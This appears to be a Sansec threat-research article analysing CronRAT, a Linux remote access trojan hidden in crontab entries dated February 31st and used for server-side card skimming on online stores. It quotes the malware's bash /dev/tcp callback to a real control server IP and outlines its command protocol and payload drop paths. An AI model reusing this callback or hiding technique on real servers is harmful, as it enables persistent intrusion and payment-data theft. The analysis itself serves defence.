# CronRAT malware hides behind February 31st **sansec.io/research/cronrat** 24th November 2021 [Web Skimming / Sansec Threat Research](https://sansec.io/research) Learn about new eCommerce hacks? November 24, 2021 Receive an alert whenever we discover new hacks or vulnerabilities that may affect your online store. What is Magecart? Also known as digital skimming, this crime has surged since 2015. Criminals steal card data during online shopping. Who are behind these notorious hacks, how does it work, and how have Magecart attacks evolved over time? [About Magecart](https://sansec.io/what-is-magecart) **In the run-up to Black Friday, Sansec discovered a sophisticated threat that is packed** **with never-seen stealth techniques. This malware, dubbed “CronRAT”, hides in the** **Linux calendar system on February 31st. It is not recognized by other security** **vendors and is likely to stay undetected on critical infrastructure for the coming** **months. CronRAT enables server-side Magecart data theft which bypasses browser-** **based security solutions.** ----- At this time of year we typically see a surge in eCommerce attacks and new malware. Last [week we analyzed a clever malware attacking online stores, and today we expose another,](https://sansec.io/research/ecommerce-malware-linux-avp) much more sophisticated threat. It is a Remote Access Trojan (RAT) and we have named it CronRAT. Sansec found CronRAT to be present on multiple online stores, among them a nation’s [largest outlet. Because of its novel execution, we had to rewrite part of our eComscan](https://sansec.io/ecomscan) algorithm in order to detect it. CronRAT is currently [undetected by other security vendors.](https://www.virustotal.com/gui/file/b46e51a2e757f4d75f1a1fff1165c6a0503b687db6c7e672021dcaa9bedf2d88/detection) CronRAT’s main feat is hiding in the calendar subsystem of Linux servers (“cron”) on a nonexistant day. This way, it will not attract attention from server administrators. And many security products do not scan the Linux cron system. CronRAT facilitates persistent control over an eCommerce server. Sansec has studied several cases where the presence of CronRAT lead to the injection of payment skimmers (aka [Magecart) in server-side code.](https://sansec.io/what-is-magecart) Sansec director of threat research Willem de Groot observes: Digital skimming is moving from the browser to the server and this is yet another example. Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface. CronRAT’s stealth capabilities pose a serious threat to Linux eCommerce servers: Fileless execution Timing modulation Anti-tampering checksums Controlled via binary, obfuscated protocol Launches tandem RAT in separate Linux subsystem Control server disguised as “Dropbear SSH” service Payload hidden in legitimate CRON scheduled task names ## Technical analysis ----- The CronRAT adds a number of tasks to crontab with a curious date specification: `52 23` ``` 31 2 3 . These lines are syntactically valid, but would generate a run time error when ``` executed. However, this will never happen as they are scheduled to run on February 31st. Instead, the actual malware code is hidden in the task names and is constructed using several layers of compression and base64 decoding. [The actual payload (see raw and](https://gist.github.com/gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f) [annotated copy) is a sophisticated Bash program that](https://gist.github.com/gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f#file-cronrat-annotated-sh) features self-destruction, timing modulation and a custom binary protocol to communicate with a foreign control server. As one security engineer remarks: I thought I had mastered bash, but that script is giving me a headache😅 [— アルミ (@schrotthaufen) November 25, 2021](https://twitter.com/schrotthaufen/status/1463977342666170372?ref_src=twsrc%5Etfw) Upon launch, it contacts the control server using an uncommon method for TCP communication: ``` eval "exec 3<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || exit_with_code 5 ``` ----- This resolves to port `443 on` `47.115.46.167, an Alibaba hosted IP. This service` generates a banner for the Dropbear SSH service, which is commonly installed on embedded devices. However, this is clearly a disguise. CronRAT implements a custom binary protocol with random checksums, to avoid detection by firewalls and packet inspectors. Once a connection with the C&C server is established, CronRAT takes these steps: 1. Discards the fake `SSH-2.0-dropbear_2017.75 banner.` 2. Sends a password, the `cio command and then (presumably) a host identifier.` 3. Waits for a `sd (self-destruct) or` `ev (eval) command from the control server` 4. Sends `prm command and password/identifier, then receives command parameters` for the sidekick RAT 5. Sends `dwn command and receives malicious dynamic library` 6. Library is saved to one of these paths: `/dev/shm,` `/run/user/UID,` `/tmp,` ----- 8. Monitors custom command for 5 seconds and, depending on success, sends `ssc,` ``` ser or sun command. ``` 9. Finishes with `cex command.` This essentially allows the RAT operator to run any code. ## Coming up In order to study the control server’s behavior, we wrote a specially crafted RAT client to intercept commands. And we tricked the C2 server into sending us yet another RAT, which [manages to embed itself in the Nginx web server process. Read about NginRAT.](https://sansec.io/research/nginrat) _[We greatly appreciate the help of Cipriano Groenendal at](https://nl.linkedin.com/in/ciprianogroenendal)_ _[Hypernode for providing malware](https://www.hypernode.com/)_ _samples and valuable analysis._ [data-size="large" > Follow @sansecio](https://twitter.com/sansecio) -----